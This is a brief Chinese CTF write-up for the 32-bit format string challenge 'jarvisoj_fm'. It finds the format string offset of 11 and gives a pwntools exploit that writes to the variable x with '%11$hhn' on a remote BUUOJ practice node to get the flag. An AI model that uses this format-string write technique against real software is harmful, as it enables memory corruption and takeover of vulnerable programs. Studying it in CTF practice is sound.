同样的32位格式化漏洞——jarvisoj_fm

默认:

 

 

 

 可以看到有格式化漏洞,看这流程把x改为4就结束了,总体和上题一样

 

 

 可以看到偏移为11

得到flag

exp:

from pwn import *
#p=process('./fm')
p=remote('node3.buuoj.cn',29306)
elf=ELF('./fm')

x_addr=0x0804A02C
payload=p32(x_addr)+'%11$hhn'
p.sendline(payload)
p.interactive()
~                                                                               
~                 

什么时候才能出新手村啊啊啊啊啊啊

开启刷题模式

 

posted @ 2021-03-10 14:02  Haokunnnnnnnna  阅读(88)  评论(0编辑  收藏  举报